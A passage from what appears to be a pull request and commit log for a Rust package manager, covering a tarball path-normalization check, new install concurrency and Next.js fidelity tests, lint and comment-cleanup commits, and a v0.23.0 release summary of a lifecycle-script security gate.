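            Component::CurDir => {}
            Component::ParentDir => return Err("path traversal detected".into()),
            Component::RootDir | Component::Prefix(_) => {
                return Err("unexpected root inside entry path".into());
            }
        }
    }
    Ok(out)
}
```

This reproduces the contracts described earlier: an absolute entry is normalized to a relative path under the package directory, and a full-width-dot directory name is treated as a literal name rather than a parent reference.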
**Item 2 — concurrency/recovery additional candidate surfaces (3 tests in `install_concurrency.rs`):** - `cache_clean_during_slow_tarball_install_does_not_corrupt_install` (G.4) — install + cache clean run concurrently (different lock paths, no serialization); install succeeds despite metadata cache wipe mid-stream. Empirical timing observed: install elapsed 1.57s, cache clean fired at t=30-39ms cleanly inside the install window. - `install_panics_after_install_hash_write_rollback_invalidates_hash` (G.5) — reuses existing `LPM_TEST_PANIC_AT=after-install` stage (no new source-side hook needed — `write_post_install_v6_hash` runs inside `run_with_options` which returns BEFORE that stage fires). Pins that Drop-based rollback restores manifest AND deletes the freshly-written install-hash. - `malformed_registry_json_fails_without_manifest_or_lockfile_mutation` (G.6) — truncated JSON on all three metadata endpoints; install fails cleanly, no panic/backtrace, package.json byte-identical, no torn lockfile. **Verdaccio-npm parity for `which@4.0.0` (`install_real_registry.rs`):** - `verdaccio_npm_parity_for_bin_package_pins_metadata_and_shim_presence` — extends the existing lodash byte-diff with a bin-shipping target package. Asserts metadata equivalence + `.bin/<name>` shim present on both sides + bin target file materialized + exec bits non-zero (POSIX). **Item 5 — realworld fidelity (new fixture + new test file):** - `tests/fixtures/realworld-nextjs/` (package.json + README) — pinned Next.js 14.2.13 + React 18.3.1 + TypeScript 5.6.3 + 3 `@types/*` packages. Resolves to ~28 transitive deps empirically. README documents the calibration methodology including raw measurement data. - `tests/workflows/tests/install_realworld.rs` — `install_realworld_nextjs_fixture_succeeds_through_verdaccio` installs the fixture through Verdaccio→npmjs and asserts end-to-end success at production scale. Always logs cold + warm wall-clock + peak RSS to stderr for calibration data. 
- **`LPM_BUDGET_GATE=1`-gated budget assertions**: cold ≤ 25s, warm ≤ 25ms, cold peak RSS ≤ 1500 MiB. Calibrated from N=6 cold + N=3 warm + N=3 RSS runs on M-series macOS, 2026-05-14. Memory measurement via `/usr/bin/time -l` (macOS) / `-v` (Linux); Windows skips with a clear warning.

This closes Item 5 entirely (all 4 acceptance criteria green) and brings Items 2/3/4 to the parked-by-design or infrastructure-blocked baseline.

CI gate: clippy `--workspace --all-targets -- -D warnings` clean, fmt clean, fancy-regex empty, build clean, `cargo nextest run --workspace` 6471/6471 pass. Suite runtime ~2:40 (was ~2:24 pre-tranche; +15s for the realworld test).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(workflows): collapse Linux-only let-chain in parse_peak_rss

CI lint on Linux failed on `clippy::collapsible_if` in the Linux-cfg'd branch of `parse_peak_rss`. The macOS branch had an intermediate `let bytes_str = rest.trim();` between the two `if let`s, which is why the local clippy run on macOS didn't catch this: only the macOS-cfg branch compiled there. Collapse the Linux branch to use `&&` (stable let-chains) so it satisfies the lint while preserving the same semantics.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
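For readers unfamiliar with the two `time` output formats that `parse_peak_rss` has to handle, the sketch below parses both without `cfg` branches or let-chains. It is not the test helper from this PR: `parse_peak_rss_bytes` is a hypothetical name, and it assumes GNU `time -v` reports kilobytes on a `Maximum resident set size (kbytes):` line while BSD/macOS `time -l` reports bytes on a `maximum resident set size` line.

```rust
/// Extracts peak RSS in bytes from the stderr of `/usr/bin/time`.
/// Handles the GNU `-v` layout (value after the label, in KiB) and the
/// BSD `-l` layout (value before the label, in bytes).
fn parse_peak_rss_bytes(time_stderr: &str) -> Option<u64> {
    for line in time_stderr.lines() {
        let line = line.trim();
        // GNU time -v: "Maximum resident set size (kbytes): 123456"
        if let Some(rest) = line.strip_prefix("Maximum resident set size (kbytes):") {
            return rest.trim().parse::<u64>().ok().map(|kib| kib * 1024);
        }
        // BSD time -l: "12345678  maximum resident set size"
        if let Some(rest) = line.strip_suffix("maximum resident set size") {
            return rest.trim().parse::<u64>().ok();
        }
    }
    None
}
```

Because both branches compile on every platform here, a lint such as `clippy::collapsible_if` would fire identically on macOS and Linux, avoiding the platform-specific blind spot the commit describes.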
tolgaergin added a commit that referenced this pull request on May 16, 2026
Strip phase numbers, trial labels, and date stamps from comments per the comment-cleanup plan. Keep all load-bearing technical content (libdeflate rationale, parent-dir memoization, exec-bit handling, 0o644-floor normalization). Pure comment edits, no code changes. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request on May 16, 2026
This reverts commit cd407d6.
tolgaergin added a commit that referenced this pull request on May 16, 2026
Strip phase/trial/audit-finding labels and date stamps from comments, rewrite the surviving doc blocks to be concise and load-bearing. Pure comment edits, no code changes. Net −154 lines. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request on May 16, 2026
Strip phase/audit-finding labels and date stamps; rewrite doc blocks to be concise and load-bearing. Rename ambiguous `Phase 1/2/3/4` intra-linker pipeline references to `Stage 1/2/3/4` so they don't read like roadmap-phase numbers. Pure comment edits, no code changes. Net −70 lines. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Summary
Merges phase-46 onto main, documenting the v0.23.0 release cut on 2026-04-23.
main was held pristine during the entire phase-46 development window (54 feature commits), so this merge is a clean fast-forward
with the full code change in a single PR, plus three tag-cut-day
commits (bench harness fix, perf fix, bench baseline).
Tag v0.23.0 was cut on phase-46 @ cb01216 before this PR was opened, and the Release workflow has already completed green:
binaries published to npm + Homebrew formula updated + wrapper
package refreshed. This PR is merge-only, not release-in-flight.
What's in 46.0
Ships the four-layer tiered lifecycle-script gate
(§4 of the plan doc):
--policy=deny|allow|triage + trust snapshot
zero false-positive reds)
--min-release-age + minimumReleaseAge)
check) +
--ignore-provenance-drift[-all] overrides
delta render)
P8 (LLM triage) deferred to Phase 46.1. Hard preconditions
P5 + P6 ship here.
Tag-cut validation (§18)
Full validation doc:
a-package-manager/DOCS/new-features/37-rust-client-phase46-nextjs-validation.md (filled in on the companion branch, pushed separately to
tolgaergin/a-package-manager#phase-46-p4-server-side).
Full bench baseline:
bench/baselines/2026-04-23-46.0-macos-arm64.md.
Tag-cut day commits (this week)
ed001fa: bench harness honors BENCH_WORK_DIR + BENCH_PROJECT_DIR env overrides so cold-install-clean doesn't trigger VS Code --no-ignore rg storms on the workspace
f19d23e: install.rs > build_blocked_set_metadata fanout via futures::future::join_all; serial per-package awaits cost ~770 ms on a 277-pkg tree, parallel cost ~200 ms (noise-floor deny-mode delta)
4607f4f: macOS arm64 bench baseline for the 46.0 tag cut
cb01216: version bump to 0.23.0
Scope boundary (§17)
Project installs only. Global-install support for the tiered
gate ships in Phase 46.1 alongside LLM triage (P8).
Test plan
cargo clippy --workspace --all-targets -- -D warnings, cargo fmt --check, fancy-regex guard, cargo build --workspace, cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast: 4217/4217, cargo test -p lpm-auth × 3: 47/47 each
v0.23.0 green (npm + Homebrew + wrapper published)
🤖 Generated with Claude Code